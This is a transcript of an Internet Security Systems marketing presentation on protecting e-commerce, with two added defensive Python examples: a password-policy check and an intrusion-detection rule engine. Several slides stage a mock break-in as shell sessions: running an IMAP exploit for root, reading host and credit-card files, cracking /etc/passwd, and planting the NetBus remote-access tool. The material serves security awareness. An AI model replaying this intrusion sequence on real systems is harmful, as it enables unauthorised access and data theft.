
Protecting The Digital Economy

Protecting The Digital Economy. David Gerulski Director of Marketing Internet Security Systems. Agenda. Introduction E-Commerce Security Drivers Developing a Security Policy Anatomy of an Attack Policy Enforcement Enterprise Risk Management Security Resources Conclusion. ISS Overview.


Presentation Transcript


  1. Protecting The Digital Economy. David Gerulski, Director of Marketing, Internet Security Systems

  2. Agenda • Introduction • E-Commerce Security Drivers • Developing a Security Policy • Anatomy of an Attack • Policy Enforcement • Enterprise Risk Management • Security Resources • Conclusion

  3. ISS Overview • Headquartered in Atlanta, GA, USA • Pioneered vulnerability assessment and intrusion detection technology • Leader in Enterprise Security Management • Publicly traded on NASDAQ: ISSX • Industry-leading technology: 35+ product awards • 1,000+ employee owners worldwide • Over 300 certified security partners • Over 7,500 customers worldwide

  4. ISS Market Share [chart panels: Network Intrusion Detection & Assessment Market; Network Intrusion Detection Market; Network Vulnerability Assessment Market] Source: International Data Corporation (IDC), August 1999

  5. E-Commerce Security Drivers

  6. Business Is Changing
     Yesterday: Internal Focus. Access is granted to employees only.
     Today: External Focus. Suppliers, customers, and prospects all need some form of access.
     Yesterday: Centralized Assets. Applications and data are centralized in fortified IT bunkers.
     Today: Distributed Assets. Applications and data are distributed across servers, locations, and business units.
     Yesterday: Prevent Losses. The goal of security is to protect against confidentiality breaches.
     Today: Generate Revenue. The goal of security is to enable eCommerce.
     Yesterday: IT Control. Security manager decides who gets access.
     Today: Business Control. Business units want the authority to grant access.
     Source: Forrester Research, Inc.

  7. The Threat Grows [bar chart: percentage by year, 1996 to 1998; values shown 54%, 47%, 38%; axis ticks 20%, 40%, 60%] Source: 1998 Computer Security Institute/FBI Computer Crime and Security Survey

  8. The Internal Threat Is Real

  9. E-Commerce Issues. Principal Business Drivers • Increase Revenue • Increase Profitability. Principal Security Drivers • Greater Susceptibility to Attack • Greater Probability of Catastrophic Consequences • Much Greater “Loss to Incident” Ratio

  10. Our Strength Is Our Weakness • In Touch With Anyone With a Modem • Have an International Presence • Partners Can Now Collaborate • Leverage Web-based Supply Chain Technologies • Employees Can Work From Home, at Night, Over the Weekends, and on Holiday • Application Servers Can Support Entire Divisions

  11. Consequences • Exposure to Legal Liability

  12. DDoS: Distributed Denial-of-Service [network diagram with labels: Company A, UNIX, Firewall, Web Server, NT, UNIX, UNIX, NT, Company B, Router, University A, Company C, Company D]

  13. Consequences • Exposure to legal liability • Decreased Stockholder Equity • 30 Seconds on CNN • Damaged Image

  14. Consequences • Exposure to Legal Liability • Decreased Stockholder Equity • 30 Seconds on CNN • Damaged Image • Decreased Employee Productivity • Loss of Intellectual Property & Assets • Inefficient Use of Resources

  15. Summary • E-Business is here to stay • Networks are exposed and under attack • There’s no more turning a “blind eye” • It’s a business issue and it should be treated in a business-like manner • Implement a security program not a security technology

  16. Developing a Security Policy: A Blueprint for Success

  17. Security Policy • Blueprint for a Good Security Program • Standards Based - British Standard 7799 • Management Buy-In • High Level to Technical • Business Driven, Not Vendor Driven • Non-Static

  18. Enforced Security Policy • Minimize Exposure to Vulnerabilities • Prepare for Attacks on Our Systems • Manage Internal Staff Behavior • Manage External Access and Activity • Maintain Appropriate Security Configurations & Response Strategies • Exploit Built-in Security Features • Measure and Record Patterns and Trends for Future Security Planning

  19. The Anatomy of an Attack

  20. bigwidget.com

  21. Registrant:
     Big Widget, Inc. (BIGWIDGET_DOM)
     1111 Big Widget Drive
     Really Big, CA 90120
     US
     Domain Name: BIGWIDGET.COM
     Administrative Contact, Technical Contact:
     Simms, Haywood (HS69) Haywood.Simms@BIGWIDGET.COM
     1111 Big Widget Drive, UMIL04-07
     Really Big, CA 90210
     678-443-6001
     Zone Contact, Billing Contact:
     Dodge, Rodger (RD32) Rodger.Dodge@BIGWIDGET.COM
     1111 Big Widget Drive, UMIL04-47
     Really Big, CA 90210
     678-443-6014
     Record last updated on 24-June-2000
     Record expires on 20-Mar-2010
     Record created on 14-Mar-1998
     Database last updated on 7-Jun-2000 15:54
     Domain servers in listed order:
     EHECATL.BIGWIDGET.COM 208.21.0.7
     NS1-AUTH.SPRINTLINK.NET 206.228.179.10
     NS.COMMANDCORP.COM 130.205.70.10

  22. hacker:~$ telnet bigwidget.com 25
     Trying 10.0.0.28...
     Connected to bigwidget.com
     Escape character is '^]'.
     Connection closed by foreign host.
     hacker:~$ telnet bigwidget.com 143
     Trying 10.0.0.28...
     Connected to bigwidget.com.
     * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to MRC@CAC.Washington.EDU)
     . logout
     * BYE bigwidget IMAP4rev1 server terminating connection
     . OK LOGOUT completed
     Connection closed by foreign host.

  23. imap

  24. imap

  25. hacker ~$ ./imap_exploit bigwidget.com
     IMAP Exploit for Linux.
     Author: Akylonius (aky@galeb.etf.bg.ac.yu)
     Modifications: p1 (p1@el8.org)
     Completed successfully.
     hacker ~$ telnet bigwidget.com
     Trying 10.0.0.28...
     Connected to bigwidget.com.
     Red Hat Linux release 4.2 (Biltmore)
     Kernel 2.0.35 on an i686
     login: root
     bigwidget:~# whoami
     root
     bigwidget:~# cd /etc
     bigwidget:~# cat ./hosts
     127.0.0.1 localhost localhost.localdomain
     208.21.2.10 thevault accounting
     208.21.2.11 fasttalk sales
     208.21.2.12 geekspeak engineering
     208.21.2.13 people human resources
     208.21.2.14 thelinks marketing
     208.21.2.15 thesource information systems
     bigwidget:~# rlogin thevault

  26. thevault:~# cd /data/creditcards
     thevault:~# cat visa.txt
     Allan B. Smith 6543-2223-1209-4002 12/99
     Donna D. Smith 6543-4133-0632-4572 06/98
     Jim Smith 6543-2344-1523-5522 01/01
     Joseph L. Smith 6543-2356-1882-7532 04/02
     Kay L. Smith 6543-2398-1972-4532 06/03
     Mary Ann Smith 6543-8933-1332-4222 05/01
     Robert F. Smith 6543-0133-5232-3332 05/99
     thevault:~# crack /etc/passwd
     Cracking /etc/passwd...
     username: bobman password: nambob
     username: mary password: mary
     username: root password: ncc1701
     thevault:~# ftp thesource
     Connected to thesource
     220 thesource Microsoft FTP Service (Version 4.0).
     Name: administrator
     331 Password required for administrator.
     Password: *******
     230 User administrator logged in.
     Remote system type is Windows_NT.
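The cracking step on this slide turns up passwords that are the user name, the user name reversed, or a well-known string. The following is an added example, not part of the presentation or of any ISS product: a password-policy check that would have rejected those credentials before they reached /etc/passwd. The three accounts are the ones shown in the crack output; the minimum length, the character-class rule, the small deny-list (which includes the cracked root password) and the passing account "kay" are constructed assumptions.

```python
import re

MIN_LENGTH = 8          # assumption: policy minimum
MIN_CHAR_CLASSES = 3    # assumption: require three of lower, upper, digit, symbol

# Constructed deny-list: the cracked root password from the slide plus a few obvious choices.
COMMON_PASSWORDS = {"ncc1701", "password", "123456", "qwerty", "letmein"}

# Accounts as shown in the slide's crack output, plus one constructed account that passes.
SAMPLE_ACCOUNTS = {
    "bobman": "nambob",
    "mary": "mary",
    "root": "ncc1701",
    "kay": "Widget-Vault!98",   # constructed
}


def username_variants(username):
    """Trivial transforms of the user name that a cracker's wordlist tries first."""
    u = username.lower()
    return {u, u[::-1], u + u, u + "1", "1" + u, u + "123"}


def char_classes(password):
    """Count how many of the four character classes the password uses."""
    patterns = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")
    return sum(bool(re.search(p, password)) for p in patterns)


def check_password(username, password):
    """Return the list of policy violations; an empty list means the password passes."""
    problems = []
    p = password.lower()
    u = username.lower()
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if p in username_variants(username):
        problems.append("derived from the user name")
    elif len(u) >= 3 and (u in p or u[::-1] in p):
        # substring test only for names long enough not to match by accident
        problems.append("contains the user name")
    if p in COMMON_PASSWORDS:
        problems.append("on the common-password deny-list")
    if char_classes(password) < MIN_CHAR_CLASSES:
        problems.append(f"uses fewer than {MIN_CHAR_CLASSES} character classes")
    return problems


def audit(accounts):
    """Check every account; returns {username: [violations]}."""
    return {user: check_password(user, pw) for user, pw in accounts.items()}


if __name__ == "__main__":
    for user, problems in audit(SAMPLE_ACCOUNTS).items():
        status = "OK" if not problems else "REJECT: " + "; ".join(problems)
        print(f"{user:8} {status}")
```

Run against the slide's accounts, all three cracked passwords fail on several counts at once; the check is cheap enough to run at password-change time, which is the point where the slide's outcome is still avoidable.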

  27. ftp> cd \temp
     250 CDW command successful.
     ftp> send netbus.exe
     local: netbus.exe remote: netbus.exe
     200 PORT command successful.
     150 Opening BINARY mode data connection for netbus.exe
     226 Transfer complete.
     ftp> quit
     thevault:~$ telnet thesource
     Trying 208.21.2.160...
     Connected to thesource.bigwidget.com.
     Escape character is '^]'.
     Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
     Welcome to MS Telnet Service
     Telnet Server Build 5.00.98217.1
     login: administrator
     password: *******
     *===============================================================
     Welcome to Microsoft Telnet Server.
     *===============================================================
     C:\> cd \temp
     C:\TEMP> netbus.exe

  28. [NetBus 1.6, by cf; screendump; connected to the.source.bigwidget.com] David Smith, President@bigwidget.com
     David Smith <dsmith@bigwidget.com>  My Raise <URGENT>
     Dear Mr. Smith, I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it. Your Son, Dave

  29. Anatomy of the Attack [diagram of BigWidget's Network with the attack steps labelled imap, Crack, NetBus; components: Web Server, NT, UNIX, UNIX, NT, UNIX, Firewall, Router, Network, E-Mail Server, Clients & Workstations]

  30. Real World Web Page Defacements

  31. New York Times

  32. Policy Enforcement Through Detection and Response

  33. What Is Vulnerable? IT Infrastructure: Web Server, Servers, Firewall, Router, Network, E-Mail Server, Clients & Workstations

  34. What Is Vulnerable? Applications: E-Commerce Web Server, Peoplesoft, SAP, Firewall, Router, E-Mail Server, Web Browsers

  35. What Is Vulnerable? Databases: Microsoft SQL Server, Sybase, Oracle [diagram labels: Firewall, Router]

  36. What Is Vulnerable? Operating Systems: Solaris, HP-UX, Windows NT, AIX, Windows 95 & NT [diagram labels: Firewall, Router, Network]

  37. What Is Vulnerable? Networks: TCP/IP, Netware [diagram labels: Web Server, Servers, Firewall, Router, E-Mail Server]

  38. Enterprise Risk Management

  39. Enterprise Security Management

  40. Vulnerability Assessment Service: Corrective Action Report
     Vulnerability: GetAdmin
     Severity: High Risk
     IP Address: 215.011.200.255
     OS: Windows NT 4.0
     Fix: From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt.

  41. Managed Intrusion Detection Service (INTERNAL) [flow diagram: ATTACK DETECTED, with response branches EMAIL ALERT/LOG, SESSION TERMINATED, SESSION LOGGED, RECONFIGURE FIREWALL/ROUTER, RECORD SESSION]
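The attack walk-through (slides 22 to 29) and the response flow on the slide above describe the two halves of a detection-and-response loop without showing where they meet. The following is an added example, not part of the presentation or of any ISS product: a small rule engine that reads connection and login events, flags the pattern the walk-through shows (service probing from outside, a privileged login from an external address, then logins and uploads fanning out from the host that was just taken), and attaches the slide's response actions to each alert. The log format, the external address 192.0.2.77, the internal address block 208.21.0.0/16 and the five-minute probe window are constructed assumptions; the destination addresses come from the host list on slide 25.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Assumption: BigWidget's own address block, inferred from the host list on slide 25.
INTERNAL = ip_network("208.21.0.0/16")
PRIVILEGED = {"root", "administrator"}
PROBE_WINDOW = timedelta(minutes=5)   # assumption: two service ports hit within 5 minutes is a probe

# Constructed log, one event per line: "<timestamp> <src> <dst> <port> <event> <detail>".
# 192.0.2.77 stands in for the attacker's host; the rest follows the walk-through.
SAMPLE_LOG = """\
1998-10-14T11:50:01 192.0.2.77 208.21.0.7 25 connect smtp
1998-10-14T11:50:05 192.0.2.77 208.21.0.7 143 connect imap
1998-10-14T11:51:50 192.0.2.77 208.21.0.7 143 banner IMAP4rev1
1998-10-14T11:53:10 192.0.2.77 208.21.0.7 23 login root
1998-10-14T11:54:00 208.21.0.7 208.21.2.10 513 login root
1998-10-14T11:56:30 208.21.2.10 208.21.2.15 21 upload netbus.exe
"""


@dataclass
class Event:
    ts: datetime
    src: str
    dst: str
    port: int
    kind: str
    detail: str


@dataclass
class Alert:
    rule: str
    src: str
    dst: str
    actions: tuple   # response actions named on the slide


def parse_log(text):
    """Parse the constructed six-field log format into Event objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, kind, detail = line.split()
        events.append(Event(datetime.fromisoformat(ts), src, dst, int(port), kind, detail))
    return events


def is_internal(addr):
    return ip_address(addr) in INTERNAL


def analyse(events):
    """Run the three rules over the events in time order; returns (alerts, compromised hosts)."""
    alerts = []
    compromised = set()
    ports_seen = defaultdict(list)   # (src, dst) -> [(ts, port), ...]
    probes_reported = set()
    for ev in sorted(events, key=lambda e: e.ts):
        external = not is_internal(ev.src)
        # Rule 1: an outside host touching several service ports on one server within the window.
        if external and ev.kind == "connect":
            key = (ev.src, ev.dst)
            ports_seen[key].append((ev.ts, ev.port))
            recent = {port for ts, port in ports_seen[key] if ev.ts - ts <= PROBE_WINDOW}
            if len(recent) >= 2 and key not in probes_reported:
                probes_reported.add(key)
                alerts.append(Alert("service-probe", ev.src, ev.dst,
                                    ("EMAIL ALERT/LOG", "RECORD SESSION")))
        # Rule 2: a privileged login straight from outside: cut the session and block the source.
        if ev.kind == "login" and ev.detail in PRIVILEGED and external:
            compromised.add(ev.dst)
            alerts.append(Alert("external-privileged-login", ev.src, ev.dst,
                                ("SESSION TERMINATED", "RECONFIGURE FIREWALL/ROUTER", "EMAIL ALERT/LOG")))
        # Rule 3: logins or file uploads that originate from a host already marked compromised.
        elif ev.kind in ("login", "upload") and ev.src in compromised:
            compromised.add(ev.dst)
            alerts.append(Alert("lateral-from-compromised-host", ev.src, ev.dst,
                                ("SESSION LOGGED", "EMAIL ALERT/LOG")))
    return alerts, compromised


if __name__ == "__main__":
    found, hosts = analyse(parse_log(SAMPLE_LOG))
    for a in found:
        print(f"{a.rule:30} {a.src} -> {a.dst}: {', '.join(a.actions)}")
    print("hosts to treat as compromised:", sorted(hosts))
```

On the constructed log the engine raises four alerts: the probe of ports 25 and 143, the root login from outside, and the two hops that follow it. The compromised set it carries forward is what makes the third rule work: once a host has been logged into from outside as root, its own outbound logins and uploads are no longer ordinary internal traffic, which is exactly the rlogin-then-ftp chain the walk-through relies on.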
